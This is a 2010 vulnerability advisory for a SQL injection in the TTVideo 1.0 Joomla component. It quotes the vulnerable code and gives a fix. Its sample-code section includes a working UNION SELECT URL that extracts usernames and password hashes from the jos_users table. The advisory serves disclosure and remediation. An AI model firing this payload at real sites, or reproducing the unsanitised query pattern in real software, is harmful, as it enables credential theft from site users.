Joomla TTVideo 1.0 SQL Injection

`TTVideo 1.0 Joomla Component SQL Injection Vulnerability  
  
Name TTVideo  
Vendor http://www.toughtomato.com  
Versions Affected 1.0  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-07-27  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
________________________  
  
TTVideo is a Joomla! component that makes use of the  
popular video sharing site Vimeo to create a video  
library.  
  
  
II. DESCRIPTION  
_______________  
  
A parameter in ttvideo.php is not properly sanitised  
before being used in a SQL query.  
  
  
III. ANALYSIS  
_____________  
  
Summary:  
  
A) SQL Injection  
  
  
A) SQL Injection  
________________  
  
The parameter cid passed to ttvideo.php when task is set  
to video is not properly sanitised before being used in  
a SQL query. This can be exploited to manipulate SQL  
queries by injecting arbitrary SQL code. The following  
is the vulnerable code:  
  
ttvideoController.php (line 40):  
  
function video() {  
$cid = JRequest::getVar('cid', null, 'default');  
  
  
ttvideo.php (line 188):  
  
function getVideo($id) {  
$db = $this->getDBO();  
$db->setQuery("SELECT * from #__ttvideo WHERE id=$id");  
$video = $db->loadObject();   
if ($video === null)  
JError::raiseError(500, 'Video with ID: '.$id.' not found.');  
return $video;  
}  
  
  
IV. SAMPLE CODE  
_______________  
  
A) SQL Injection  
  
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users  
  
  
V. FIX  
______  
  
Use JRequest::getInt instead of JRequest::getVar  
  
`